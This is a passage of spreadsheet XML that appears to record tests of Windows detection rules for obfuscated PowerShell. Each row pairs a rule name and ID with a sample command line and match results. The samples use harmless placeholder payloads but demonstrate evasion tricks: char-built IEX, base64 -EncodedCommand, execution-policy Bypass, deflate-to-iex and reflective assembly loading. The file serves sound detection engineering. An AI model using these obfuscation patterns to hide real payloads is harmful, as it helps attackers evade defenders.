      <c r="D3114" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E3114" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F3114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3114" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3114" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J3114" s="43" t="n"/>
      <c r="K3114" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3115" ht="15.75" customHeight="1" s="42">
      <c r="A3115" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3115" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C3115" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D3115" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E3115" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F3115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3115" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3115" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J3115" s="43" t="n"/>
      <c r="K3115" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3116" ht="15.75" customHeight="1" s="42">
      <c r="A3116" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3116" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C3116" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D3116" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E3116" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F3116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3116" s="43" t="n"/>
      <c r="J3116" s="43" t="n"/>
      <c r="K3116" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3117" ht="15.75" customHeight="1" s="42">
      <c r="A3117" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3117" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3117" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3117" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3117" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F3117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3117" s="43" t="n"/>
      <c r="J3117" s="43" t="n"/>
      <c r="K3117" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3118" ht="15.75" customHeight="1" s="42">
      <c r="A3118" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3118" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3118" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3118" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3118" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F3118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3118" s="43" t="n"/>
      <c r="J3118" s="43" t="n"/>
      <c r="K3118" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3119" ht="15.75" customHeight="1" s="42">
      <c r="A3119" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3119" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3119" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3119" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3119" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F3119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3119" s="43" t="n"/>
      <c r="J3119" s="43" t="n"/>
      <c r="K3119" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3120" ht="15.75" customHeight="1" s="42">
      <c r="A3120" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3120" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3120" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3120" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3120" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F3120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3120" s="43" t="n"/>
      <c r="J3120" s="43" t="n"/>
      <c r="K3120" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3121" ht="15.75" customHeight="1" s="42">
      <c r="A3121" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3121" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3121" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3121" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3121" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3121" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3121" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3121" s="43" t="n"/>
      <c r="K3121" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3122" ht="15.75" customHeight="1" s="42">
      <c r="A3122" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3122" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3122" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3122" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3122" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3122" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3122" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3122" s="43" t="n"/>
      <c r="K3122" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3123" ht="15.75" customHeight="1" s="42">
      <c r="A3123" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3123" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3123" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3123" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3123" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3123" s="43" t="n"/>
      <c r="J3123" s="43" t="n"/>
      <c r="K3123" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3124" ht="15.75" customHeight="1" s="42">
      <c r="A3124" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3124" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C3124" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D3124" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E3124" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3124" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3124" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J3124" s="43" t="n"/>
      <c r="K3124" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3125" ht="15.75" customHeight="1" s="42">
      <c r="A3125" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3125" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3125" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3125" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3125" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F3125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3125" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3125" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3125" s="43" t="n"/>
      <c r="K3125" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3126" ht="15.75" customHeight="1" s="42">
      <c r="A3126" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3126" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3126" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3126" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3126" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F3126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3126" s="43" t="n"/>
      <c r="J3126" s="43" t="n"/>
      <c r="K3126" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3127" ht="15.75" customHeight="1" s="42">
      <c r="A3127" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3127" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C3127" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D3127" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E3127" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F3127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3127" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3127" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3127" s="43" t="n"/>
      <c r="K3127" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3128" ht="15.75" customHeight="1" s="42">
      <c r="A3128" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3128" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3128" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3128" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3128" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F3128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3128" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3128" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3128" s="43" t="n"/>
      <c r="K3128" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3129" ht="15.75" customHeight="1" s="42">
      <c r="A3129" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3129" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3129" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3129" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3129" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXEcutIonpoliCY Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3129" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3129" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3129" s="43" t="n"/>
      <c r="K3129" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3130" ht="15.75" customHeight="1" s="42">
      <c r="A3130" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3130" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3130" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3130" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3130" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3130" s="43" t="n"/>
      <c r="K3130" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3131" ht="15.75" customHeight="1" s="42">
      <c r="A3131" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3131" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3131" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3131" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3131" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3131" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3131" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3131" s="43" t="n"/>
      <c r="K3131" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3132" ht="15.75" customHeight="1" s="42">
      <c r="A3132" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3132" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3132" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3132" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3132" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCutIoNPoLicY Bypass /"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3132" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3132" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3132" s="43" t="n"/>
      <c r="K3132" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3133" ht="15.75" customHeight="1" s="42">
      <c r="A3133" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3133" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3133" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3133" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3133" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3133" s="43" t="n"/>
      <c r="J3133" s="43" t="n"/>
      <c r="K3133" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3134" ht="15.75" customHeight="1" s="42">
      <c r="A3134" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3134" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3134" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3134" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3134" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3134" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3134" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3134" s="43" t="n"/>
      <c r="K3134" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3135" ht="15.75" customHeight="1" s="42">
      <c r="A3135" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3135" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3135" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3135" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3135" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3135" s="43" t="n"/>
      <c r="J3135" s="43" t="n"/>
      <c r="K3135" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3136" ht="15.75" customHeight="1" s="42">
      <c r="A3136" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3136" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3136" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3136" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3136" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3136" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3136" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3136" s="43" t="n"/>
      <c r="K3136" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3137" ht="15.75" customHeight="1" s="42">
      <c r="A3137" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3137" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3137" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3137" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3137" s="43" t="inlineStr">
        <is>
